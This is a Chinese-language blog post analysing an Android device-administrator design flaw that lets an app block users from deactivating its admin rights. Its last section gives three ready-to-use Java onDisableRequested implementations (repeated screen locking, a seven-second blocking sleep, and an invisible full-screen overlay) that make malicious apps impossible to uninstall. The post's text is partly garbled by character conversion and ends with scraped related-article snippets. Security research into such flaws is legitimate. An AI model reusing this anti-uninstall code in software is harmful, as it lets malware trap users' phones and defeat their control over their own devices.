2013年6月,俄罗斯安全厂商卡巴斯基发现了史上最强手机木马-Obad.A。该木马利用了一个未知的Android设备管理器漏洞(ANDROID-9067882),已激活设备管理器权限的手机木马利用该漏洞,能够在设置程序的设备管理器列表中隐藏,这样用户就无法通过正常途径取消该手机木马的设备管理器权限。从而达到无法卸载的目的。Android4.2版本号以上系统已经修复该漏洞。(漏洞详情:http://blog.csdn.net/androidsecurity/article/details/9124747)

日前。百度安全实验室发现手机木马開始利用还有一新的Android设备管理器漏洞,新的设备管理器漏洞是由于Android系统在取消激活设备管理器流程的设计缺陷引起的。恶意软件利用该设计缺陷。能够阻止用户取消激活设备管理器,进而达到反卸载的目的。

该漏洞存在于Android系统全部版本号。

一、取消激活设备管理器源码分析

Android取消激活设备管理器流程源码:

Android取消激活设备管理器基本流程图:

1、ActivityManagerNative.getDefault().stopAppSwitch()方法功能

为什么第一步就调用该函数呢?通过源码凝视能够看出调用该函数目的是:禁止其他程序在用户取消设备管理器操作过程弹出Dialog,影响用户操作。

stopAppSwitch()源码例如以下图所看到的:

通过代码我们发现该方法的详细实现是:

规定在APP_SWITCH_DELAY_TIME时间内禁止进行Activity切换。

该方法调用后,全部应用的Activity调用请求会被系统放到挂起的请求队列中。

被挂起的Activity调用请求会在APP_SWITCH_DELAY_TIME时间后才会被系统运行。

通过调用stopAppSwitch()方法,系统保证在进入取消设备管理器界面后,5秒内不会进行Activity的切换。

二、漏洞原理分析

通过以上流程我们发现。在第8步设备管理器调用

DevicePolicyManagerService.removeActiveAdmin()取消激活设备管理器之前,DevicePolicyManagerService会调用应用的onDisableRequested方法获取取消激活的警示信息。

假设onDisableRequested函数返回内容为空的,第8步就会自己主动运行;假设onDisableRequested函数返回内容不能为空。会弹出Dialog显示返回的警示信息。提示用户是否取消激活。用户点击确认后才会运行第8步。

怎样阻止流程运行到第8步呢?

onDisableRequested是唯一在流程第8步之前被调用的函数。为了阻止流程走到第8步,onDisableRequested函数满足下面条件就可以:

1、返回内容不能为空。这样才干够使设备管理器弹出取消激活设备管理器警示信息  Dialog。

2、通过Activity切换的方式使设备管理器弹出的警示信息Dialog消失。使用户无法操作Dialog。

假设做到以上两点,程序就可以成功阻止用户取消激活设备管理器操作。

三、漏洞利用方法

下面提出三种能够利用该流程设计缺陷,成功阻止用户取消设备管理器的方法。

1、通过锁屏方式

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. final DevicePolicyManager dpm = (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
  8. dpm.lockNow();
  9. new Thread(new Runnable() {
  10. @Override
  11. public void run() {
  12. int i = 0;
  13. while(i<70){
  14. dpm.lockNow();
  15. try {
  16. Thread.sleep(100);
  17. i++;
  18. } catch (InterruptedException e) {
  19. e.printStackTrace();
  20. }
  21. }
  22. }
  23. }).start();
  24. return "This is a onDisableRequested response message";
  25. }

2、通过堵塞函数返回方式

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. try {
  8. Thread.sleep(7000);
  9. } catch (InterruptedException e) {
  10. e.printStackTrace();
  11. }
  12. return "This is a onDisableRequested response message";
  13. }

3、通过透明窗体劫持方式

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. WindowManager.LayoutParams wmParams;
  8. final WindowManager mWindowManager;
  9. wmParams = new WindowManager.LayoutParams();
  10. mWindowManager = (WindowManager)context.getSystemService(Context.WINDOW_SERVICE);
  11. wmParams.type = WindowManager.LayoutParams.TYPE_SYSTEM_ALERT;
  12. wmParams.format = PixelFormat.RGBX_8888;
  13. wmParams.flags = WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE;
  14. wmParams.gravity = Gravity.LEFT | Gravity.TOP;
  15. wmParams.alpha = 0;
  16. wmParams.x = 0;
  17. wmParams.y = 0;
  18. wmParams.width = WindowManager.LayoutParams.MATCH_PARENT;
  19. wmParams.height = WindowManager.LayoutParams.MATCH_PARENT;
  20. final View contentView = new Button(context);
  21. mWindowManager.addView(contentView, wmParams);
  22. new Thread(new Runnable() {
  23. @Override
  24. public void run() {
  25. try {
  26. Thread.sleep(7000);
  27. } catch (InterruptedException e) {
  28. // TODO Auto-generated catch block
  29. e.printStackTrace();
  30. }
  31. mWindowManager.removeView(contentView);
  32. }
  33. }).start();
  34. return "This is a onDisableRequested response message";
  35. }

以上方法都会在onDisableRequested中,採用不同模式使用户能够5无法操作秒内接口。因为5秒Activity系统切换请求将被执行。

版权声明:本文博客原创文章,博客,未经同意,不得转载。

Android设备管理器漏洞2--禁止用户取消激活设备管理器的更多相关文章

  1. Android 设备管理器 阻止用户取消激活

    该方案测试可行,系统版本4.4.2.它算是借助android系统的一个bug,不确定在后续更高的版本中是否修复. 该功能和360防卸载功能一样的实现原理. 主要的参考资料是:http://bbs.pe ...

  2. Android设备管理器漏洞(转)

    一.漏洞描述 目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载.其实该漏洞早在去年底已被发现. ...

  3. 安全错误使用CORS在IE10与Node和Express及XMLHttpRequest: 网络错误 0x4c7, 操作已被用户取消

    在IE下:VUE项目,后台替换为https请求之后,vue热更新请求挂起,控制台报错:XMLHttpRequest: 网络错误 0x4c7, 操作已被用户取消.但是chrome与Firefox正常 当 ...

  4. android提权漏洞CVE-2010-EASY修复【转】

    本文转载自: http://blog.csdn.net/lhj0711010212/article/details/9351131 android提权漏洞CVE-2010-EASY修复   linux ...

  5. Android新的漏洞的应用程序中的发现!

    最近,趋势科技发现一些Android中的漏洞应用程序内存.来发动攻击.我们调查了两个受影响的应用程序,大家来感受一下: .超过一千万次安装.及在下载页面拥有数十万笔用户留言的生产力应用程序(生产力应用 ...

  6. Linux—禁止用户SSH登录方法总结

    Linux-禁止用户SSH登录方法总结 一.禁止用户登录 1.修改用户配置文件/etc/shadow       将第二栏设置为"*",如下.那么该用户就无法登录.但是使用这种方式 ...

  7. ASP.net 实现禁止用户重复登录

    本文先为大家介绍如何利用缓存Cache方便地实现此功能. Cache与Session这二个状态对像的其中有一个不同之处,Cache是一个全局对象,作用的范围是整个应用程序,所有用户:而Session是 ...

  8. linux gcc++漏洞:普通用户获得root权限

    linux gcc++漏洞:普通用户获得root权限 2012-02-06 10:22:38|  分类: linux安全|举报|字号 订阅       经我测试在RHEL5 / CentOS5 / F ...

  9. [iOS微博项目 - 2.3] - 用户取消对app的授权

    github: https://github.com/hellovoidworld/HVWWeibo   A.用户取消对app的授权 用户可以在微博网站上取消对某个应用(app)的授权   1.打开& ...

随机推荐

  1. 怎样在Ubuntu中使用条件布局

    我们知道现代手机能够随着手持的方位发生改变而使得手机的方位也随着发生改变.对有些应用来说,我们也希望手机的布局也能尾随发生变化.第二种情况是当我们的应用安装到不同屏幕尺寸的平台上,我们希望我们的布局会 ...

  2. asp.net2.0安全性(1)--用户角色篇(起篇)--转载来自车老师

    安全管理的解决方案在.net1.1中几乎为一片空白,对于应用程序的验证与授权大部分的工作是开发人员自己编写代码,或者是借助企业库等工具来实现,此可谓.net1.1中的一大缺憾.在.net2.0中微软为 ...

  3. Silverlight技术调查(2)——跨域访问

    原文 Silverlight技术调查(2)——跨域访问 此调查web容器采用的是Tomcat,若允许所有域访问,只需在webapps下的根应用ROOT中,加入配置文件:clientaccesspoli ...

  4. thinkphp 设置跨域请求

    场景:我的本地网页服务器无法访问本地的接口服务器接口提示一下错误:大致意思是:是一个跨域请求我的没有访问该地址的权限(接口服务器采用的是PHP编写) XMLHttpRequest cannot loa ...

  5. HBase数据存储格式

    好的数据结构,对于检索数据,插入数据的效率就会很高. 常见的数据结构 B+树 根节点和枝节点非常easy,分别记录每一个叶子节点的最小值,并用一个指针指向叶子节点.  叶子节点里每一个键值都指向真正的 ...

  6. c#1所搭建的核心基础之类型系统的特征

    类型系统的特征简介 几乎每种编程语言都有某种形式的一个类型系统.类型系统大致被分为:强/弱,安全/不安全,静态/动态,显式/隐式等类型. c#在类型系统世界中的位置 c#1的类型系统是静态的.显式的和 ...

  7. 虚拟机安装中文Fedora14和C/C++IDE开发环境

    虚拟机安装中文Fedora14和C/C++IDE开发环境 2010-12-05 00:15:58 标签:中文Fedora14 IDE 开发环境 C/C++ 原创作品,允许转载,转载时请务必以超链接形式 ...

  8. Maven项目下 java.lang.ClassNotFoundException 常规解决的方法

    网上非常多要改动.class .project的比較麻烦有时候还不一定管用.以下的方法适合于项目用已经引用了jar.可是执行时却ClassNotFound,请用例如以下方法试试: 严重: Error ...

  9. Swift - 自定义单元格实现微信聊天界面

    1,下面是一个放微信聊天界面的消息展示列表,实现的功能有: (1)消息可以是文本消息也可以是图片消息 (2)消息背景为气泡状图片,同时消息气泡可根据内容自适应大小 (3)每条消息旁边有头像,在左边表示 ...

  10. 使用Delphi声明C++带函数的结构体实战 good

    在小组开发中,应用程序部分采用Delphi7,一些组件使用C++做.在今天将一个动态库的C++接口声明头文件转换为D7的Unit单元时,一切都很顺利,直到遇到下面这样一个另类的东西: typedef ...